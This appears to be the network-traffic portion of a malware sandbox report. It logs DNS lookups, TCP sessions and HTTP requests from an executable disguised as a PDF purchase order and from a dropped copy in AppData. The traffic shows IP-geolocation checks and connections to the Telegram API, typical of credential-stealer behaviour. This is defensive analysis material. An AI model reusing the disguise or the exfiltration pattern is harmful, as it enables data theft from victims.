                                                                                Oct 25, 2024 09:17:24.258403063 CEST49738443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:24.262218952 CEST4973480192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:24.263472080 CEST4974180192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:24.269089937 CEST8049741132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:24.269217968 CEST4974180192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:24.269227028 CEST8049734132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:24.269269943 CEST4973480192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:24.269423008 CEST4974180192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:24.274941921 CEST8049741132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:25.083581924 CEST8049740132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:25.084914923 CEST49744443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.084960938 CEST44349744188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.085037947 CEST49744443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.085382938 CEST49744443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.085393906 CEST44349744188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.126600027 CEST4974080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.158359051 CEST8049741132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:25.160063982 CEST49745443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.160131931 CEST44349745188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.160207033 CEST49745443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.160590887 CEST49745443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.160609007 CEST44349745188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.204696894 CEST4974180192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.693424940 CEST44349744188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.695219040 CEST49744443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.695245028 CEST44349744188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.773699045 CEST44349745188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.775454998 CEST49745443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.775484085 CEST44349745188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.836361885 CEST44349744188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.836452007 CEST44349744188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.839772940 CEST49744443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.843497038 CEST49744443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.863737106 CEST4974080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.869599104 CEST8049740132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:25.869777918 CEST4974080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.872375011 CEST49747443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:25.872416019 CEST44349747149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:25.872564077 CEST49747443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:25.886003017 CEST49747443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:25.886024952 CEST44349747149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:25.917073011 CEST44349745188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.917330980 CEST44349745188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:25.917643070 CEST49745443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.918256044 CEST49745443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:25.921366930 CEST4974180192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.922641993 CEST4974880192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.927186012 CEST8049741132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:25.927293062 CEST4974180192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.928041935 CEST8049748132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:25.928206921 CEST4974880192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.928317070 CEST4974880192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:25.934326887 CEST8049748132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:26.713875055 CEST44349747149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:26.715198040 CEST49747443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:26.719244957 CEST49747443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:26.719269037 CEST44349747149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:26.719633102 CEST44349747149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:26.730276108 CEST49747443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:26.775341034 CEST44349747149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:26.800252914 CEST8049748132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:26.802500010 CEST49749443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:26.802541971 CEST44349749188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:26.802618980 CEST49749443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:26.803078890 CEST49749443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:26.803091049 CEST44349749188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:26.845325947 CEST4974880192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:26.966129065 CEST44349747149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:26.966217995 CEST44349747149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:26.966281891 CEST49747443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:26.970279932 CEST49747443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:27.416409969 CEST44349749188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:27.428077936 CEST49749443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:27.428123951 CEST44349749188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:27.564985991 CEST44349749188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:27.565220118 CEST44349749188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:27.565285921 CEST49749443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:27.566137075 CEST49749443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:27.569397926 CEST4974880192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:27.569993973 CEST4975080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:27.575146914 CEST8049748132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:27.575489998 CEST8049750132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:27.575551987 CEST4974880192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:27.575589895 CEST4975080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:27.575687885 CEST4975080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:27.583266020 CEST8049750132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:28.658778906 CEST8049750132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:28.660491943 CEST49751443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:28.660525084 CEST44349751188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:28.660604000 CEST49751443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:28.660914898 CEST49751443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:28.660926104 CEST44349751188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:28.669812918 CEST8049750132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:28.669882059 CEST4975080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:29.279969931 CEST44349751188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:29.282360077 CEST49751443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:29.282387972 CEST44349751188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:29.437994957 CEST44349751188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:29.438112974 CEST44349751188.114.97.3192.168.2.8
                                                                                Oct 25, 2024 09:17:29.438162088 CEST49751443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:29.438749075 CEST49751443192.168.2.8188.114.97.3
                                                                                Oct 25, 2024 09:17:29.448277950 CEST4975080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:29.449228048 CEST49752443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:29.449270010 CEST44349752149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:29.449361086 CEST49752443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:29.449816942 CEST49752443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:29.449836969 CEST44349752149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:29.454113960 CEST8049750132.226.247.73192.168.2.8
                                                                                Oct 25, 2024 09:17:29.454185009 CEST4975080192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:30.286726952 CEST44349752149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:30.286830902 CEST49752443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:30.288477898 CEST49752443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:30.288492918 CEST44349752149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:30.288731098 CEST44349752149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:30.290026903 CEST49752443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:30.331336975 CEST44349752149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:30.533940077 CEST44349752149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:30.534030914 CEST44349752149.154.167.220192.168.2.8
                                                                                Oct 25, 2024 09:17:30.534112930 CEST49752443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:30.536622047 CEST49752443192.168.2.8149.154.167.220
                                                                                Oct 25, 2024 09:17:32.498955011 CEST4972780192.168.2.8132.226.247.73
                                                                                Oct 25, 2024 09:17:35.713732958 CEST4972280192.168.2.8132.226.247.73
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 25, 2024 09:17:10.037425041 CEST5930453192.168.2.81.1.1.1
                                                                                Oct 25, 2024 09:17:10.045856953 CEST53593041.1.1.1192.168.2.8
                                                                                Oct 25, 2024 09:17:11.603241920 CEST5493653192.168.2.81.1.1.1
                                                                                Oct 25, 2024 09:17:11.614094973 CEST53549361.1.1.1192.168.2.8
                                                                                Oct 25, 2024 09:17:25.863738060 CEST5109653192.168.2.81.1.1.1
                                                                                Oct 25, 2024 09:17:25.871476889 CEST53510961.1.1.1192.168.2.8
                                                                                Oct 25, 2024 09:17:38.268932104 CEST5072353192.168.2.81.1.1.1
                                                                                Oct 25, 2024 09:17:38.276360035 CEST53507231.1.1.1192.168.2.8
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 25, 2024 09:17:10.037425041 CEST192.168.2.81.1.1.10xcd17Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:11.603241920 CEST192.168.2.81.1.1.10xfc45Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:25.863738060 CEST192.168.2.81.1.1.10xd2e5Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:38.268932104 CEST192.168.2.81.1.1.10x97c3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 25, 2024 09:17:10.045856953 CEST1.1.1.1192.168.2.80xcd17No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:10.045856953 CEST1.1.1.1192.168.2.80xcd17No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:10.045856953 CEST1.1.1.1192.168.2.80xcd17No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:10.045856953 CEST1.1.1.1192.168.2.80xcd17No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:10.045856953 CEST1.1.1.1192.168.2.80xcd17No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:10.045856953 CEST1.1.1.1192.168.2.80xcd17No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:11.614094973 CEST1.1.1.1192.168.2.80xfc45No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:11.614094973 CEST1.1.1.1192.168.2.80xfc45No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:25.871476889 CEST1.1.1.1192.168.2.80xd2e5No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                Oct 25, 2024 09:17:38.276360035 CEST1.1.1.1192.168.2.80x97c3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                • reallyfreegeoip.org
                                                                                • api.telegram.org
                                                                                • checkip.dyndns.org
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.849710132.226.247.73802788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:10.061732054 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:10.927773952 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:10 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 39bea8a4733d031e477dfc900f5ecb3b
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                Oct 25, 2024 09:17:10.935897112 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:11.194910049 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:11 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: c46e58a9354c45df5e8e5c8600bc0bd5
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                Oct 25, 2024 09:17:12.662090063 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:12.921621084 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:12 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 74ae288b422be402b65b6dbc8bf21c94
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.849714132.226.247.73804568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:13.550790071 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:14.416539907 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 9d0fcec59629596947dd47fcbe32c103
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                Oct 25, 2024 09:17:14.420986891 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:14.680291891 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 49e826b208ac6e347cf0914b55b8706d
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                Oct 25, 2024 09:17:15.646193027 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:15.904947996 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:15 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 2184249c241c734384f13b48847f5487
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.849716132.226.247.73802788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:13.724272013 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:14.589092016 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 8e25c691414f280f1277593ffa579752
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.849719132.226.247.73802788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:15.383764029 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:16.256469011 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:16 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: e13bbac4c34dd4c8971c4f570b8dc521
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.849722132.226.247.73804568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:16.670674086 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:17.524621964 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: a09bdb555a93547b453619b1ee379ccd
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.849723132.226.247.73802788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:17.028789043 CEST127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Oct 25, 2024 09:17:17.901664972 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 7415dae602fa8867c8b54048c82ad723
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.849726132.226.247.73804568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 25, 2024 09:17:18.312068939 CEST151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Oct 25, 2024 09:17:19.176733971 CEST323INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:19 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 106
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: b38828119e8ffc343ee0bb503759fce0
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
